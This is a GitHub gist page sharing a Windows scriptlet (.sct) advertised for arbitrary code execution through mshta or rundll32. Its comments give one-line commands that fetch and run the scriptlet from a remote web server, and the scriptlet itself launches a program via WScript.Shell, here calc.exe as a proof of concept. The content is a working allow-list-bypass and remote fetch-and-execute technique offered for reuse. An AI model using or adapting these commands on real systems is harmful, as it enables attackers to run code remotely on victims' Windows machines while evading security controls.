Skip to content

Instantly share code, notes, and snippets.

@Arno0x

Arno0x/scriptlet.sct

Created Nov 17, 2017
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
Raw
scriptlet.sct
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment